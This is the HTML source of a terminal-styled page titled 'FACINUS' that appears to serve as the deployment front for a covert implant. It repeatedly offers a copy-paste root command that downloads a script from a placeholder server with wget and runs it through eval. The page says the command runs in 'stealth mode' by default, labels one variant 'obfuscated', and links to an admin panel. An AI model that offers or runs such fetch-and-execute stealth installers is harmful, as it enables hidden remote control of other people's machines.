219 lines
6.2 KiB
HTML
219 lines
6.2 KiB
HTML
<!DOCTYPE html>
|
|
<html lang="en">
|
|
<head>
|
|
<meta charset="UTF-8">
|
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
<title>FACINUS</title>
|
|
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
|
|
<style>
|
|
:root {
|
|
--bg: #111111;
|
|
--text: #33ff33;
|
|
--secondary: #aaaaaa;
|
|
--border: #333333;
|
|
--hover: #222222;
|
|
}
|
|
|
|
* {
|
|
box-sizing: border-box;
|
|
margin: 0;
|
|
padding: 0;
|
|
}
|
|
|
|
body {
|
|
font-family: 'Courier New', monospace;
|
|
background-color: var(--bg);
|
|
color: var(--text);
|
|
line-height: 1.5;
|
|
padding: 20px;
|
|
max-width: 900px;
|
|
margin: 0 auto;
|
|
}
|
|
|
|
pre {
|
|
font-family: 'Courier New', monospace;
|
|
overflow-x: auto;
|
|
white-space: pre;
|
|
}
|
|
|
|
.ascii-header {
|
|
margin-bottom: 30px;
|
|
font-size: 12px;
|
|
line-height: 1.2;
|
|
}
|
|
|
|
h2 {
|
|
margin: 20px 0;
|
|
border-bottom: 1px dashed var(--border);
|
|
padding-bottom: 5px;
|
|
}
|
|
|
|
.command {
|
|
background: rgba(0, 0, 0, 0.3);
|
|
border: 1px solid var(--border);
|
|
padding: 10px;
|
|
margin: 15px 0;
|
|
position: relative;
|
|
overflow-x: auto;
|
|
white-space: nowrap;
|
|
}
|
|
|
|
.command-prompt::before {
|
|
content: "$ ";
|
|
opacity: 0.7;
|
|
}
|
|
|
|
.copy-btn {
|
|
position: absolute;
|
|
right: 10px;
|
|
top: 7px;
|
|
background: transparent;
|
|
color: var(--secondary);
|
|
border: 1px solid var(--border);
|
|
border-radius: 3px;
|
|
padding: 3px 8px;
|
|
cursor: pointer;
|
|
font-size: 12px;
|
|
font-family: 'Courier New', monospace;
|
|
}
|
|
|
|
.copy-btn:hover {
|
|
background: var(--hover);
|
|
color: var(--text);
|
|
}
|
|
|
|
.options {
|
|
display: grid;
|
|
grid-template-columns: repeat(auto-fill, minmax(250px, 1fr));
|
|
gap: 15px;
|
|
margin: 20px 0;
|
|
}
|
|
|
|
.option-box {
|
|
border: 1px solid var(--border);
|
|
padding: 15px;
|
|
background: rgba(0, 0, 0, 0.3);
|
|
}
|
|
|
|
.option-box:hover {
|
|
background: var(--hover);
|
|
}
|
|
|
|
.option-title {
|
|
margin-bottom: 10px;
|
|
font-weight: bold;
|
|
}
|
|
|
|
.note {
|
|
border-left: 2px solid var(--text);
|
|
padding-left: 10px;
|
|
margin: 15px 0;
|
|
color: var(--secondary);
|
|
}
|
|
|
|
.admin-link {
|
|
display: inline-block;
|
|
margin-top: 20px;
|
|
padding: 8px 15px;
|
|
background: transparent;
|
|
color: var(--text);
|
|
border: 1px solid var(--text);
|
|
text-decoration: none;
|
|
font-family: 'Courier New', monospace;
|
|
}
|
|
|
|
.admin-link:hover {
|
|
background: rgba(51, 255, 51, 0.1);
|
|
}
|
|
|
|
@media (max-width: 600px) {
|
|
.options {
|
|
grid-template-columns: 1fr;
|
|
}
|
|
|
|
.ascii-header {
|
|
font-size: 8px;
|
|
}
|
|
}
|
|
</style>
|
|
</head>
|
|
<body>
|
|
<div class="ascii-header">
|
|
<pre>
|
|
____ __ ___ __ __ _ _ _ ____
|
|
( __)/ _\ / __)( )( ( \/ )( \/ ___)
|
|
) _)/ \( (__ )( / /) \/ (\___ \
|
|
(__) \_/\_/ \___)(__)\_)__)\____/(____/
|
|
|
|
|
|
</pre>
|
|
</div>
|
|
|
|
<h2>> deployment</h2>
|
|
|
|
<div class="command">
|
|
<span class="command-prompt">eval "$(wget -qO- http://SERVER_IP/deployment/y)"</span>
|
|
<button class="copy-btn" onclick="copyToClipboard('cmd1')">copy</button>
|
|
</div>
|
|
|
|
<div class="note">
|
|
requires root access. runs in stealth mode by default.
|
|
</div>
|
|
|
|
<h2>> options</h2>
|
|
|
|
<div class="options">
|
|
<div class="option-box">
|
|
<div class="option-title">> minimal</div>
|
|
<div class="command command-prompt">
|
|
eval "$(wget -qO- http://SERVER_IP/deployment/y)"
|
|
<button class="copy-btn" onclick="copyToClipboard('cmd2')">copy</button>
|
|
</div>
|
|
</div>
|
|
|
|
<div class="option-box">
|
|
<div class="option-title">> user mode</div>
|
|
<div class="command command-prompt">
|
|
eval "$(wget -qO- http://SERVER_IP/deployment/y)"
|
|
<button class="copy-btn" onclick="copyToClipboard('cmd3')">copy</button>
|
|
</div>
|
|
</div>
|
|
|
|
<div class="option-box">
|
|
<div class="option-title">> obfuscated</div>
|
|
<div class="command command-prompt">
|
|
eval "$(wget -qO- http://SERVER_IP/deployment/y)"
|
|
<button class="copy-btn" onclick="copyToClipboard('cmd4')">copy</button>
|
|
</div>
|
|
</div>
|
|
|
|
<div class="option-box">
|
|
<div class="option-title">> one-liner</div>
|
|
<div class="command command-prompt">
|
|
eval "$(wget -qO- http://SERVER_IP/deployment/y)"
|
|
<button class="copy-btn" onclick="copyToClipboard('cmd5')">copy</button>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
|
|
<h2>> admin</h2>
|
|
<a href="admin.php" class="admin-link">$ access admin panel</a>
|
|
|
|
<script>
|
|
function copyToClipboard(elementId) {
|
|
const el = document.querySelector(`#${elementId}`);
|
|
const text = el ? el.innerText.split('\n')[0].trim() : document.querySelector('.command-prompt').innerText.trim();
|
|
|
|
navigator.clipboard.writeText(text).then(function() {
|
|
const btn = event.target;
|
|
const originalText = btn.innerText;
|
|
btn.innerText = "copied!";
|
|
setTimeout(() => {
|
|
btn.innerText = originalText;
|
|
}, 1000);
|
|
});
|
|
}
|
|
</script>
|
|
</body>
|
|
</html>
|